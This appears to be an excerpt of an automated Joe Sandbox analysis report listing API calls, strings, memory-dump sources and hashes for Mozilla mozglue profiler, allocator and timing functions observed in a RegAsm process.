                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C12EC55
                                                                                      • free.MOZGLUE(00000000), ref: 6C12EC5C
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_start, xrefs: 6C12EBB4
                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                      • API String ID: 1341148965-1186885292
                                                                                      • Opcode ID: fb4a881338456b5223bb6899ec39abae4d2e52a1f32313af60a23c1b3a910293
                                                                                      • Instruction ID: 0aaada6036323e3a17cf8c71e00fb1d67e681596e3288576a997ec89ee0383c9
                                                                                      • Opcode Fuzzy Hash: fb4a881338456b5223bb6899ec39abae4d2e52a1f32313af60a23c1b3a910293
                                                                                      • Instruction Fuzzy Hash: 34A15935700604CFDB10DF2AC854BBA77B5FF86318F14402AE92987F81DB389995DBA1
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F70E
                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C12F8F9
                                                                                        • Part of subcall function 6C0F6390: GetCurrentThreadId.KERNEL32 ref: 6C0F63D0
                                                                                        • Part of subcall function 6C0F6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0F63DF
                                                                                        • Part of subcall function 6C0F6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0F640E
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F93A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F98A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F990
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F994
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F716
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                        • Part of subcall function 6C0EB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C0EB5E0
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F739
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F746
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F793
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C16385B,00000002,?,?,?,?,?), ref: 6C12F829
                                                                                      • free.MOZGLUE(?,?,00000000,?), ref: 6C12F84C
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C12F866
                                                                                      • free.MOZGLUE(?), ref: 6C12FA0C
                                                                                        • Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F5E8C
                                                                                        • Part of subcall function 6C0F5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5E9D
                                                                                        • Part of subcall function 6C0F5E60: GetCurrentThreadId.KERNEL32 ref: 6C0F5EAB
                                                                                        • Part of subcall function 6C0F5E60: GetCurrentThreadId.KERNEL32 ref: 6C0F5EB8
                                                                                        • Part of subcall function 6C0F5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5ECF
                                                                                        • Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C0F5F27
                                                                                        • Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C0F5F47
                                                                                        • Part of subcall function 6C0F5E60: GetCurrentProcess.KERNEL32 ref: 6C0F5F53
                                                                                        • Part of subcall function 6C0F5E60: GetCurrentThread.KERNEL32 ref: 6C0F5F5C
                                                                                        • Part of subcall function 6C0F5E60: GetCurrentProcess.KERNEL32 ref: 6C0F5F66
                                                                                        • Part of subcall function 6C0F5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0F5F7E
                                                                                      • free.MOZGLUE(?), ref: 6C12F9C5
                                                                                      • free.MOZGLUE(?), ref: 6C12F9DA
                                                                                      Strings
                                                                                      • " attempted to re-register as ", xrefs: 6C12F858
                                                                                      • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C12F9A6
                                                                                      • Thread , xrefs: 6C12F789
                                                                                      • [D %d/%d] profiler_register_thread(%s), xrefs: 6C12F71F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                      • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                      • API String ID: 882766088-1834255612
                                                                                      • Opcode ID: 0b3aec4df99c017b1e4d341bef51c8b03cd0ab5a3fdf8a04b6387e16756c685b
                                                                                      • Instruction ID: 30c6e9185e850c560721f006d24591d4ad46c35887e30b86db0d49f40909725b
                                                                                      • Opcode Fuzzy Hash: 0b3aec4df99c017b1e4d341bef51c8b03cd0ab5a3fdf8a04b6387e16756c685b
                                                                                      • Instruction Fuzzy Hash: 05814675A043109FDB00DF25C844BAAB7F5FF85308F40856DE8959BB51EB34E889CB92
                                                                                      APIs
                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0F4196
                                                                                      • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0F41F1
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4223
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F422A
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4231
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4238
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F4245
                                                                                      • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0F4263
                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C0F427A
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C0F4299
                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F42C4
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F42F6
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4302
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4309
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4310
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F4317
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F4324
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                      • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                      • API String ID: 3038791930-999387375
                                                                                      • Opcode ID: 28ca7df949dced918a6ecae9fe4c5737a39b4cdfd7edaf551beb5acad034031d
                                                                                      • Instruction ID: 64194e266c141ebbe6531a2af4eca33ea7fdff10839acd5b1159ed3cdb3a59d9
                                                                                      • Opcode Fuzzy Hash: 28ca7df949dced918a6ecae9fe4c5737a39b4cdfd7edaf551beb5acad034031d
                                                                                      • Instruction Fuzzy Hash: 775125B1A042106BEB106BA5CD08FBA77BCEF86714F014628FE119B6C0DB74DD91DBA0
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EE60
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EE6D
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EE92
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EEA5
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C12EEB4
                                                                                      • free.MOZGLUE(00000000), ref: 6C12EEBB
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EEC7
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12EECF
                                                                                        • Part of subcall function 6C12DE60: GetCurrentThreadId.KERNEL32 ref: 6C12DE73
                                                                                        • Part of subcall function 6C12DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0F4A68), ref: 6C12DE7B
                                                                                        • Part of subcall function 6C12DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0F4A68), ref: 6C12DEB8
                                                                                        • Part of subcall function 6C12DE60: free.MOZGLUE(00000000,?,6C0F4A68), ref: 6C12DEFE
                                                                                        • Part of subcall function 6C12DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C12DF38
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EF1E
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EF2B
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EF59
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EFB0
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EFBD
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EFE1
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EFF8
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F000
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F02F
                                                                                        • Part of subcall function 6C12F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12F09B
                                                                                        • Part of subcall function 6C12F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C12F0AC
                                                                                        • Part of subcall function 6C12F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C12F0BE
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_pause, xrefs: 6C12F008
                                                                                      • [I %d/%d] profiler_stop, xrefs: 6C12EED7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                      • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                      • API String ID: 16519850-1833026159
                                                                                      • Opcode ID: 34edd9f9a33b2d31cac15aaa5764972de975bfce5bc237f93b9944b290b8da83
                                                                                      • Instruction ID: 46c37604ba308a39da14913b8fd1d14be99a47ff7264c5973ddd34334f9463c6
                                                                                      • Opcode Fuzzy Hash: 34edd9f9a33b2d31cac15aaa5764972de975bfce5bc237f93b9944b290b8da83
                                                                                      • Instruction Fuzzy Hash: 9451133A6042109FDB00AB7BD4087B577B8EF4632DF100569F93583F80DB384998EBA6
                                                                                      APIs
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16E804), ref: 6C11D047
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C11D093
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C11D0A6
                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C16E810,00000040), ref: 6C11D0D0
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E7B8,00001388), ref: 6C11D147
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E744,00001388), ref: 6C11D162
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E784,00001388), ref: 6C11D18D
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E7DC,00001388), ref: 6C11D1B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                      • API String ID: 2957312145-326518326
                                                                                      • Opcode ID: 7ea4e9c7a7d6f203c8960748088ecfb7c06919b10bbf728844e7e91ebf0d43c1
                                                                                      • Instruction ID: 14ab3bd9e53ae31afe4ef25f672fb6cec490e0df36a71a606f30b3db632c5674
                                                                                      • Opcode Fuzzy Hash: 7ea4e9c7a7d6f203c8960748088ecfb7c06919b10bbf728844e7e91ebf0d43c1
                                                                                      • Instruction Fuzzy Hash: AB81EF70B082109FEB01AF6ACD54B79BBB8EF56308F100239E91197F80D7799A15DBD2
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12FADC
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12FAE9
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12FB31
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12FB43
                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C12FBF6
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12FC50
                                                                                      Strings
                                                                                      • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6C12FC94
                                                                                      • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C12FD15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                      • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                      • API String ID: 2101194506-3679350629
                                                                                      • Opcode ID: 08355f5f9891cd0edbf34a9a1b6157779baf5bfa186e7e665e60fb9901cc8bfe
                                                                                      • Instruction ID: a26efe8b593a76c9645a13e0871d6560da133d2757ee334edfd57539f1d8d742
                                                                                      • Opcode Fuzzy Hash: 08355f5f9891cd0edbf34a9a1b6157779baf5bfa186e7e665e60fb9901cc8bfe
                                                                                      • Instruction Fuzzy Hash: B0711479A04710CFD710DF2AC448B6AB7F0FF85308F01856DE8658BB51EB38A895CB91
                                                                                      APIs
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5E9D
                                                                                        • Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
                                                                                        • Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
                                                                                        • Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
                                                                                        • Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C0F5EAB
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C0F5EB8
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5ECF
                                                                                      • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C0F6017
                                                                                        • Part of subcall function 6C0E4310: moz_xmalloc.MOZGLUE(00000010,?,6C0E42D2), ref: 6C0E436A
                                                                                        • Part of subcall function 6C0E4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0E42D2), ref: 6C0E4387
                                                                                      • moz_xmalloc.MOZGLUE(00000004), ref: 6C0F5F47
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C0F5F53
                                                                                      • GetCurrentThread.KERNEL32 ref: 6C0F5F5C
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C0F5F66
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0F5F7E
                                                                                      • moz_xmalloc.MOZGLUE(00000024), ref: 6C0F5F27
                                                                                        • Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2
                                                                                      • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F5E8C
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F605D
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F60CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                      • String ID: GeckoMain
                                                                                      • API String ID: 3711609982-966795396
                                                                                      • Opcode ID: ae73b46fe84be6d7bc8313183c8c3a5292cd2e242e14d9c2b671641670e617aa
                                                                                      • Instruction ID: ac5c0661013d011dd8802cec946cddaf9493b17dd29cfc07ae6cfb556b0b8b5b
                                                                                      • Opcode Fuzzy Hash: ae73b46fe84be6d7bc8313183c8c3a5292cd2e242e14d9c2b671641670e617aa
                                                                                      • Instruction Fuzzy Hash: 6071E2B0A057408FD710DF29C480B6ABBF0FF59308F54496DE89687B52D730E999CB92
                                                                                      APIs
                                                                                        • Part of subcall function 6C0E31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0E3217
                                                                                        • Part of subcall function 6C0E31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0E3236
                                                                                        • Part of subcall function 6C0E31C0: FreeLibrary.KERNEL32 ref: 6C0E324B
                                                                                        • Part of subcall function 6C0E31C0: __Init_thread_footer.LIBCMT ref: 6C0E3260
                                                                                        • Part of subcall function 6C0E31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0E327F
